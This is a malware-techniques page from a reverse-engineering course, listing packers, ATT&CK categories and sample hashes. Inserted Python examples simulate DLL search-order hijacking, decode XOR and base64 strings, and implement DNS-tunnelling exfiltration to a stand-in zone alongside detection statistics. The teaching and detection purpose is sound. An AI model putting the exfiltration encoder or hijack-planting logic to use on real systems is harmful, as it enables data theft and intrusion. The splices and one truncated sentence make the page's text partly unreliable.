---
layout: default
permalink: /RE101/section2.1/
title: Malware Techniques
---

[Go Back to Reverse Engineering Malware 101](https://securedorg.github.io/RE101/)

# Section 2.1: Malware Techniques #

The malware classes may exhibit one or more of the following techniques. The [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) framework provides a great reference for many of these techniques.

## Techniques Overview

* [Compression](#compression)
* [Obfuscation](#obfuscation)
* [Persistence](#persistence)
* [Privilege Escalation](#privilege-escalation)
* [Defense Evasion](#defense-evasion)
* [Credential Theft](#credential-theft)
* [Reconnaissance](#reconnaissance)
* [Lateral Movement](#lateral-movement)
* [Execution](#execution)
* [Collection](#collection)
* [Exfiltration](#exfiltration)
* [Command and Control](#command-and-control)

---

## Compression

* Combining the compressed data with decompression code into a single executable
* Runtime packers
* Self-extracting archives
* List of packers
  * [Armadillo](http://www.siliconrealms.com/armadillo.php)
  * [ASPack](http://www.aspack.com/aspack.html)
  * [ASPR (ASProtect)](http://www.aspack.com/asprotect32.html)
  * [BoxedApp Packer](http://www.boxedapp.com/boxedapppacker)
  * [CExe](http://www.scottlu.com/Content/CExe.html)
  * [dotBundle](http://www.dotbundle.com)
  * [Enigma Protector](http://www.enigmaprotector.com)
  * [EXE Bundle](http://www.webtoolmaster.com/exebundle.htm)
  * [EXE Stealth](http://www.webtoolmaster.com/exestealth.htm)
  * [eXPressor](http://www.cgsoftlabs.ro/express.html)
  * [FSG](http://xtreeme.prv.pl/)
  * [kkrunchy](http://www.farbrausch.de/~fg/kkrunchy/)
  * [MEW](https://web.archive.org/web/20070831063728/http://northfox.uw.hu/index.php?lang=eng&id=dev)
  * [MPRESS](http://www.matcode.com/mpress.htm)
  * [Obsidium](http://www.obsidium.de)
  * [PESpin](http://pespin.w.interia.pl)
  * [Petite](http://www.un4seen.com/petite)
  * [RLPack Basic](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/RLPack-Basic-Edition.shtml)
  * [Smart Packer Pro](http://www.smartpacker.nl)
  * [Themida](http://www.oreans.com/themida.php)
  * [UPX](https://upx.github.io/)
  * [VMProtect](http://vmpsoft.com/products/vmprotect)
  * [XComp/XPack](http://soft-lab.de/JoKo)

[Goto Top^](#techniques-overview)

---

## Obfuscation

* Deliberate act of creating code that is difficult for humans to understand
* Plain-text strings will appear base64-encoded or XOR-encoded
* Malicious behavior will be interleaved with junk functions or routines that do nothing, to throw off the reverser
* Control-flow flattening
* String encryption

![alt text](https://securedorg.github.io/images/CodeObfuscation.gif "CodeObfuscation")

### Example Malware

| Name | Hash | Link |
| --- | --- | --- |
| EXTRAC32.EXE | f4d9660502220c22e367e084c7f5647c21ad4821d8c41ce68e1ac89975175051 | [virustotal](https://www.virustotal.com/en/file/f4d9660502220c22e367e084c7f5647c21ad4821d8c41ce68e1ac89975175051/analysis/) |

[Goto Top^](#techniques-overview)

---

## Persistence

* Once malware gains access to a system, it often looks to stay there for a long time.
* If the persistence mechanism is unique enough, it can even serve as a great way to identify a given piece of malware.
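The DLL search order hijacking example shown next in this section (and listed again under Privilege Escalation below) comes down to the order in which the Windows loader probes directories for a DLL that is requested by bare file name. The following is an added example and not part of the original course page: it models that order in Python over a constructed file list (the `Vendor` application, `vendorlib.dll`, `missing.dll` and all paths are made up) and reports, for each import, the directories in which an attacker could plant a same-named DLL so that it loads instead. The KnownDLLs set is a hand-picked subset of the real registry list.

```python
import ntpath

# Loader constants for a default install (fixed here for the example; a real
# tool would read them with GetSystemDirectory / GetWindowsDirectory).
SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"

# A handful of entries from the KnownDLLs list. The full list lives under
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs; the loader
# always takes these from System32 and never searches the path for them.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "advapi32.dll"}


def search_order(app_dir, cwd, path_dirs=(), safe_mode=True):
    """Directories the loader tries, in order, for a bare DLL name.

    With SafeDllSearchMode on (the default) the current directory is searched
    only after the system directories; with it off, the current directory is
    tried right after the application directory and before System32."""
    system_dirs = [SYSTEM32, SYSTEM16, WINDIR]
    if safe_mode:
        return [app_dir, *system_dirs, cwd, *path_dirs]
    return [app_dir, cwd, *system_dirs, *path_dirs]


def resolve_dll(name, files, app_dir, cwd, path_dirs=(), safe_mode=True):
    """Simulate LoadLibrary(name) for a bare file name (no manifest, no
    redirection, no absolute path) against `files`, a list of full paths.

    Returns (path_loaded, dirs_searched_first). Every directory in
    dirs_searched_first is a spot where a same-named DLL would win instead;
    path_loaded is None for a 'phantom' import that nothing currently satisfies."""
    index = {ntpath.normcase(p): p for p in files}  # case-insensitive, like NTFS

    def lookup(directory):
        return index.get(ntpath.normcase(ntpath.join(directory, name)))

    if name.lower() in KNOWN_DLLS:
        return lookup(SYSTEM32), []
    searched = []
    for directory in search_order(app_dir, cwd, path_dirs, safe_mode):
        hit = lookup(directory)
        if hit is not None:
            return hit, searched
        searched.append(directory)
    return None, searched


def hijack_report(imports, files, app_dir, cwd, **loader_opts):
    """For each import of an executable living in app_dir: where it loads from,
    and which directories an attacker with write access could plant it in."""
    report = {}
    for dll in imports:
        loaded, before = resolve_dll(dll, files, app_dir, cwd, **loader_opts)
        report[dll] = {"loaded_from": loaded, "plant_in": before}
    return report


# Constructed scenario (no real product): app.exe imports four DLLs.
APP_DIR = r"C:\Program Files\Vendor"
CWD = r"C:\Users\alice\Downloads"
IMPORTS = ["kernel32.dll", "version.dll", "vendorlib.dll", "missing.dll"]
CLEAN_FS = [
    r"C:\Program Files\Vendor\app.exe",
    r"C:\Program Files\Vendor\vendorlib.dll",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Windows\System32\version.dll",
]
# After the attack: a version.dll dropped beside app.exe is loaded on every
# start (persistence, and privilege escalation if app.exe runs elevated).
# The planted kernel32.dll is ignored because it is a KnownDLL.
PLANTED_FS = CLEAN_FS + [
    r"C:\Program Files\Vendor\version.dll",
    r"C:\Program Files\Vendor\kernel32.dll",
]

if __name__ == "__main__":
    for label, fs in (("clean", CLEAN_FS), ("planted", PLANTED_FS)):
        print(f"--- {label}")
        for dll, info in hijack_report(IMPORTS, fs, APP_DIR, CWD).items():
            print(f"{dll:<14} <- {info['loaded_from']}  plant_in={info['plant_in']}")
```

Running it shows `version.dll` switching from the System32 copy to the planted copy in the application directory, while `kernel32.dll` stays on System32; `missing.dll` is the phantom-import case, where any directory in the search path will do. On a live system the `plant_in` list corresponds to the `NAME NOT FOUND` results Procmon shows for `.dll` paths while a process starts.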
![alt text](https://securedorg.github.io/images/Persistence.png "Persistence")

Example: DLL Search Order Hijacking

![alt text](https://securedorg.github.io/images/DLLload.gif "Dll loading")

### Example Malware

| Name | Hash | Link |
| --- | --- | --- |
| Banker Trojan | cb07ec66c37f43512f140cd470912281f12d1bc9297e59c96134063f963d07ff | [virustotal](https://www.virustotal.com/en/file/cb07ec66c37f43512f140cd470912281f12d1bc9297e59c96134063f963d07ff/analysis/) |

[Goto Top^](#techniques-overview)

---

## Privilege Escalation

Exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

* Common Techniques:
  * DLL Search Order Hijacking
  * DLL Injection
  * Exploiting a vulnerability
    * Buffer overflow
    * Stack overflow
    * Heap spray
    * Return-Oriented Programming (ROP)
  * Credential Theft
  * UAC Bypasses

[Goto Top^](#techniques-overview)

---

## Defense Evasion

Evading detection or avoiding defenses.
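The Obfuscation section above notes that strings inside a sample tend to show up base64- or XOR-encoded; ATT&CK files that, together with packing, under Defense Evasion. The following added example (not from the course page) does the first-pass string recovery an analyst performs, in Python: pull `strings`-style runs out of a constructed data section, decode the ones that parse as base64, and recover a single-byte or short repeating XOR key by known plaintext (a crib such as `https://`) instead of scoring 256 guesses. The data section, the config blob, the key `k3y` and the `example.invalid` URLs are all constructed for this example.

```python
import base64
import binascii
import re

# Bytes we count as "text": printable ASCII plus tab, CR and LF.
TEXT_BYTES = frozenset(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that look like text; 0.0 for empty input."""
    return sum(b in TEXT_BYTES for b in data) / len(data) if data else 0.0


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """What `strings` would print: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


_B64 = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def try_base64(s: str):
    """Return the decoded text if s is well-formed base64 that decodes to text,
    else None. The length and alphabet checks stop ordinary identifiers such as
    API names from being 'decoded' into garbage."""
    if len(s) % 4 or not _B64.match(s):
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("ascii", errors="replace") if printable_ratio(raw) >= 0.95 else None


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key (a 1-byte key is the single-byte case)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(blob: bytes, crib: bytes, max_keylen: int = 8):
    """Known-plaintext attack on single- or repeating-key XOR.

    For each candidate key length L and each offset i, assume the crib sits at
    offset i: key[(i+j) % L] = blob[i+j] ^ crib[j]. When the crib is longer
    than L the same key byte is derived more than once and must agree, so a
    contradiction rejects the offset. A candidate is accepted when the whole
    decrypted blob looks like text. Returns (key, plaintext) or None."""
    for keylen in range(1, max_keylen + 1):
        if len(crib) < keylen:
            break  # the crib can no longer pin down every key byte
        for i in range(len(blob) - len(crib) + 1):
            key = [None] * keylen
            for j, c in enumerate(crib):
                k = blob[i + j] ^ c
                slot = (i + j) % keylen
                if key[slot] is not None and key[slot] != k:
                    break
                key[slot] = k
            else:
                plain = xor_repeating(blob, bytes(key))
                if printable_ratio(plain) >= 0.9:
                    return bytes(key), plain
    return None


def triage_strings(section: bytes) -> dict:
    """Pair every extracted string with its base64 decoding where one applies."""
    return {s: try_base64(s) for s in extract_strings(section)}


# Constructed sample data (not from any real binary): what a .data section
# might hold. The C2 URL is base64; the config is XORed with the repeating
# key b"k3y". Nothing here resolves: .invalid is reserved for examples.
CONFIG_PLAINTEXT = b"c2=https://updates.example.invalid/gate.php;key=s3cr3t-17;sleep=300"
XOR_KEY = b"k3y"
CONFIG_BLOB = xor_repeating(CONFIG_PLAINTEXT, XOR_KEY)
DATA_SECTION = (
    b"kernel32.dll\0GetProcAddress\0VirtualAlloc\0"
    + base64.b64encode(b"https://cdn.example.invalid/beacon.php") + b"\0"
    + b"\0" * 16
)

if __name__ == "__main__":
    for s, decoded in triage_strings(DATA_SECTION).items():
        print(f"{s!r:<60} -> {decoded!r}")
    hit = recover_xor_key(CONFIG_BLOB, b"https://")
    if hit:
        key, plain = hit
        print(f"xor key {key!r}: {plain.decode()!r}")
```

Crib-based recovery is used instead of "try every key and keep the most printable output" because XORing text with any constant below 0x20 leaves it almost entirely printable, so a printability score cannot tell the right key from 31 near-misses. A crib that covers every key position pins the key exactly, and the printability check then only confirms the result. Good cribs for malware configs are protocol prefixes, registry paths such as `Software\Microsoft\Windows\CurrentVersion\Run`, or the `MZ` header of an embedded payload.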
* Common Techniques:
  * Killing AV
  * Deleting itself after a run
  * Timebombs/Timestomping
  * Stolen certificates
  * DLL Side-Loading
  * Masquerading
  * Process Hollowing
  * Code Injection

### Example Malware

| Name | Hash | Link |
| --- | --- | --- |
| darkcomet backdoor | 1be0ca062facda59239cc5621d0a3807a84ed7d39377041489b09d3870958fee | [virustotal](https://www.virustotal.com/en/file/1be0ca062facda59239cc5621d0a3807a84ed7d39377041489b09d3870958fee/analysis/) |

[Goto Top^](#techniques-overview)

---

## Credential Theft

* Going after password storage
* Keylogging passwords
* Screenshots

Example: Mimikatz credential theft

![alt text](https://securedorg.github.io/images/mimikatzElevate.png "Mimikatz Elevating")

### Example Malware

| Name | Hash | Link |
| --- | --- | --- |
| mimikatz | b4d7bfcfb8f85c4d2fb8cb33c1d6380e5b7501e492edf3787adee42e29e0bb25 | [virustotal](https://www.virustotal.com/en/file/b4d7bfcfb8f85c4d2fb8cb33c1d6380e5b7501e492edf3787adee42e29e0bb25/analysis/) |

[Goto Top^](#techniques-overview)

---

## Reconnaissance

* Gain knowledge about the system and internal network.
[Goto Top^](#techniques-overview)

---

## Lateral Movement

* Enable an adversary to access and control remote systems on a network and could

### Example Malware

| Name | Hash | Link |
| --- | --- | --- |
| winmail.dat^QGIS-KOMIT .zip^QGIS-KOMIT .exe | c0f38384dd6c1536a0e19100b8d82759e240d58ed6ba50b433e892e02e819ebb | [virustotal](https://www.virustotal.com/en/file/c0f38384dd6c1536a0e19100b8d82759e240d58ed6ba50b433e892e02e819ebb/analysis/) |

[Goto Top^](#techniques-overview)

---

## Execution

* Techniques that result in execution of adversary-controlled code on a local or remote system
* Scripts
* Post-exploitation

[Goto Top^](#techniques-overview)

---

## Collection

* Identify and gather information, such as sensitive files, from a target network prior to exfiltration

### Example Malware

| Name | Hash | Link |
| --- | --- | --- |
| keylogger | 5d5c01d72216410767d089a3aabddf7fdbe3b88aff3b51b6d32280c3439038fa | [virustotal](https://www.virustotal.com/en/file/5d5c01d72216410767d089a3aabddf7fdbe3b88aff3b51b6d32280c3439038fa/analysis/) |

[Goto Top^](#techniques-overview)

---

## Exfiltration

* Removing files and information

[Goto Top^](#techniques-overview)

---

## Command and Control

* Communicate with systems under their control

### Example Malware

| Name | Hash | Link |
| --- | --- | --- |
| backdoor | 02fc2d262cb0d5e9d3e8202ea69013c5c8cc197685c73c0689cbeb243d508e76 | [virustotal](https://www.virustotal.com/en/file/02fc2d262cb0d5e9d3e8202ea69013c5c8cc197685c73c0689cbeb243d508e76/analysis/) |

[Goto Top^](#techniques-overview)

[Malware Classes <- Back](https://securedorg.github.io/RE101/section2) | [Next -> Section 3](https://securedorg.github.io/RE101/section3)
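For the Exfiltration and Command and Control sections above, the following added example (not part of the course page) shows both ends of one of the most common low-and-slow channels, data tunnelled inside DNS queries, together with the statistics a defender computes over a resolver log to spot it. The zone `cdn.example.invalid`, the session label, the 90-byte payload and the benign `corp.test` lookups are all constructed for this example.

```python
import base64
import hashlib
import math
from collections import Counter

ZONE = "cdn.example.invalid"   # constructed attacker-controlled zone
MAX_LABEL, MAX_NAME = 63, 253  # DNS limits from RFC 1035


def _b32(data: bytes) -> str:
    # base32, not base64: DNS names are case-insensitive and '/' '+' are not label characters
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(label: str) -> bytes:
    s = label.upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))  # restore the padding we stripped


def encode_exfil(session: str, payload: bytes, chunk: int = 30) -> list:
    """Malware side: one query name per chunk, <seq>-<b32data>.<session>.<zone>.
    30 raw bytes become 48 base32 characters, which leaves room for the
    sequence number inside the 63-character label limit."""
    names = []
    for seq, i in enumerate(range(0, len(payload), chunk)):
        label = f"{seq}-{_b32(payload[i:i + chunk])}"
        name = f"{label}.{session}.{ZONE}"
        if len(label) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk too large for a DNS name")
        names.append(name)
    return names


def decode_exfil(queries) -> bytes:
    """Attacker's authoritative server: reassemble from the queries it saw,
    which may arrive out of order or more than once (resolver retries)."""
    chunks = {}
    for q in queries:
        if not q.lower().endswith("." + ZONE):
            continue
        seq, _, data = q.split(".")[0].partition("-")
        chunks[int(seq)] = _unb32(data)
    return b"".join(chunks[k] for k in sorted(chunks))


def label_entropy(label: str) -> float:
    """Shannon entropy of a label in bits per character."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0


def dns_exfil_stats(queries) -> dict:
    """Defender side, over a DNS log: per zone (approximated as the last two
    labels), how many distinct names were asked for and how long and how random
    their leftmost label is. Tunnelled data shows up as many unique, long,
    high-entropy labels under one zone; normal traffic repeats a few short names."""
    by_zone = {}
    for q in set(queries):
        labels = q.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        by_zone.setdefault(".".join(labels[-2:]), []).append(labels[0])
    return {
        zone: {
            "unique_names": len(firsts),
            "mean_label_len": sum(map(len, firsts)) / len(firsts),
            "mean_label_entropy": sum(map(label_entropy, firsts)) / len(firsts),
        }
        for zone, firsts in by_zone.items()
    }


# Constructed inputs: a 90-byte stand-in for a stolen key file, and a few
# ordinary lookups as they would sit next to it in a resolver log.
SAMPLE_PAYLOAD = b"".join(hashlib.sha256(b"RE101-%d" % i).digest() for i in range(3))[:90]
BENIGN_QUERIES = ["www.corp.test", "mail.corp.test", "www.corp.test"]

if __name__ == "__main__":
    queries = encode_exfil("s7", SAMPLE_PAYLOAD)
    for q in queries:
        print(q)
    assert decode_exfil(reversed(queries)) == SAMPLE_PAYLOAD
    for zone, stats in dns_exfil_stats(queries + BENIGN_QUERIES).items():
        print(f"{zone}: {stats}")
```

The encoder keeps every label under 63 characters and every name under 253, which is why real tunnelling tools move only a few dozen bytes per query and need a sequence number to reassemble. On the detection side the three statistics are the usual starting point; thresholds have to be tuned per environment because CDNs and some security products also generate long, unique subdomains.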